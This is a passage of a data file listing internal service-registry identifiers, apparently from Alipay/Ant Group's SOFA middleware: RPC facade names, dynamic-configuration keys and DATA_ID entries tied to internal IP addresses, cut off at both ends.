urce.supportBalanceDiscount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.manage.ProductManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:crmanOpsChngAsyncRiskService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.OpenFeedFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.BankLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instdispute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@antopo#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_11.124.174.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.kmi.client.cache.refresher.keyName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdataquery.common.service.facade.FinTntbatchDbQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-mrchiscore-operation-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromoscene.common.service.facade.api.rank.RankQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:apshopcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.service.integration.sync.SyncFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.180.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.materialcenter.common.service.facade.api.material.MaterialTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCSHIELD#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.prodquery.common.service.api.ContractQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mfinsnsprod.service.facade.api.home.HomePageFeedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.tlou.TlouFamilyQueryCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ideploy.common.service.facade.resource.IcDeployActionManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.biz.sign.facade.SignContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:onehealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finpromoscene.core.service.luckyfish.repo.FinsPrizeConfigRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.manager.ClientDataManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.service.facade.CreativeDeliverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.integration.system.price.PriceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.common.service.assistinvestigate.querytask.facade.AssemblyQueryTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_ACCOUNTTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finslip.finmngDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.v2.cluster.facade.ClusterProduceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bumng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_M_BATCHFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finstore.common.service.facade.fop.mng.BizDictConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yebcore:name=com.alipay.yebcore.core.shared.drm.impl.PurchaseLimitDrmImpl.specialLimitConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lendpofprod.common.service.facade.loanapi.repay.DeferRepayQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_COLLECT_SCRIPT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundprod.common.service.facade.product.sync.ProductDataSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstmng.facade.api.datasource.DataSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.31.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echox.service.EchoxAopPlaybackService:1.0:iopengw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.SubwayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openauth.common.service.facade.rpc.AuthClientQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorPasswordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.MYBKL3AccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.capacity.PressureMeasurementDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.DataContextDrmResource.zdataContextSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfoprod.common.service.facade.FinfoServiceInstQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zplayback.playback.service.TaskManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.89.156.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ifundcontrolmodel.core.service.fundmodel.fundanalyze.forecast.service.BankAccountOrderFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iinnertrans.facade.api.InnerAccountTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","identitymatrix@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.218.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imobilemng.ac.wallet.accept.MoapAcceptAuditMngService:1.0:ipayMoapAcceptAuditMngService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:isdsp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxMirrorProdDataWriter:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mcardcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcrouter_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.130.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundcardprod.common.service.fundcard.FundCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-voucherprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchasset.common.service.facade.automat.SmartMachineQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.SecurityProductApplyService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.GoodFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:frgcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.assistinvestigate.core.RequireAddServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.224.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dsoc.service.facade.api.config.center.ReleaseQueryService:1.0:stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodtrans.senior.manage.facade.SubProductConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.foundation.facade.cashier.ifp.IfpCashierWithdrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","pom.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.creditassets.EpCommCreditAssetsOpeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.merchant.CommonRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.icooperation.api.InsDingTalkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.enableCreditBuyEscrowSplit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.100.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bugscan.service.BugScanOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.KoubeiApplyDiscountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.facade.FinProdInventoryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_DBACKAPPLY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbtemplate.common.service.facade.manage.ScriptManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:finstore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promorulemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cardbin.common.service.facade.CardBinValidateFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:financingAsset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.content.service.PcreditPromoContentServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.NameVerificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.2.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpdcore:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.industry.manage.IndustryPoolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_gfinsight_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.88.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.core.config.cache.service.MinitransNAS2OSSCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:cmscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omgpromotion.api.GrayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finhinetcore.common.service.facade.recall.facade.ReturnCallOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.ScriptSwitchStrategy.switchable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alipaypointcust.biz.rpc.benefit.BenefitExchangeRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.appservice.ServerlessAppServiceRouteWeightFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.116.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.combmng.common.service.facade.user.QueryUserInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.ValidationDeliverProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.63.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.migrateHistoryExecutionMainDataGrayUidNos,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP-TEST001#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cscenter.service.workform.compensation.facade.CompensationService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydataservice:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.core.service.common.CommonSignService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.89.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instpay.facade.asset.InstFluxService:1.0:insttrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ctu.service.manager.facade.CtuEventScriptManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ordermng_antProcessCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:publichome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcupaprod.common.service.facade.api.AuthorizedLoginManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.236.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.recoveryInStatusCheckSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.signcontract.presstest.GiftGoldApplyAccGoldArPressTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fploanmng_canceledProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.markresult.api.IMarkLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.WithdrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.26.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linepay.common.serivce.facade.mng.terminal.operator.VTerminalSignService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:antfarm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.236.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.manager.UserGroupManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.QueryRuleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.familycore.facade.FamilyRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bizops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obcustomercore.common.service.facade.UCKernelAccessorManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedOldData2SyncTableDrm.fixedMoveFlg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fdp.facade.api.MagicalBrushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zskynetTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.graycore.common.service.facade.api.influence.InfluenceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.OpManagementService:1.0:instopen@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ProcessCallback:1.0:antbuservice_antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.fundsche.api.FundScheAccountBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.zerocheck.facade.MonitorZeroWarnFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmerchant.service.facade.AlipassTemplateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.CustomSenManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isecuritycore.service.analyze.facade.SecurityPolicyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zpublishuiweb.zpublishuiweb_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insttune.common.service.facade.backend.SceneService:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.common.ipromo.mobilerpc.facade.service.AppleJuicePcreditHBService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mitemcenter.common.service.facade.api.ItemMarkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobileaix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testcenter.spi.api.ToolActionApi:1.0:regression@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencommon.rcache.facade.RCacheMonitorFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opsconsole.facade.server.ConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.242.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.antbuservice:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.mybank.pcald.common.service.facade.AssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.117.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","_CLIENTSERVICE_TEST_3_1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kacrm.industry.LayerTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.184.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dmpservice.common.service.facade.AdDataStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.YouthRelationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mbillexprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.ipay.ipromocore.common.service.facade.api.CampaignApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_HSF_HIGH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_M_MOBILESP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cicadax.facade.api.CicadaXPublishFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.facade.ImmDebugFacade:1.0:pcreditcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.paycore.service.payment.api.InstantPaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zpaas.zappinfo.facade.update.RunnablePackageUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.SqlStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundprotocol:name=com.alipay.finfundprotocol.common.service.facade.drm.ShumiSwitchDrmConfig.whiteUserList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveService:1.0:finbatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.service.facade.LoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aqe.cushion.facade.CloudCatalogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.ReceiveGotoneSmsService:1.0:processmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskportal.facade.codereview.CodeReviewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mservice#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mobileha.core.service.antha.CompatiIssueBenchmarkDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.QuestionCategoryNewFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opsconfreg.common.service.facade.ConfregClientOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.mendIntervalMinute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mbillexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:iotcms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.187.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acauditcenter.facade.AuditResourceTypeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.common.event.UniformEventMessageListener:1.0:merchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.lifecycle.antgroup.AgTerminationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:batchpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintaskmng.facade.TaskhubAntProcessCallBack:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.eval.service.MqListener:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.HavanaMemberService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findefencecore.common.service.replays.TraceInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.login.LoginInfoHistoryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.MonthlyBillDrm.showMonthYieldRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketmng.common.service.facade.api.open.ApiOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstacc.facade.quality.QualityOverviewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_GLOBALPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.consumequery.common.service.facade.ConsumeProfileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdaappdist@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID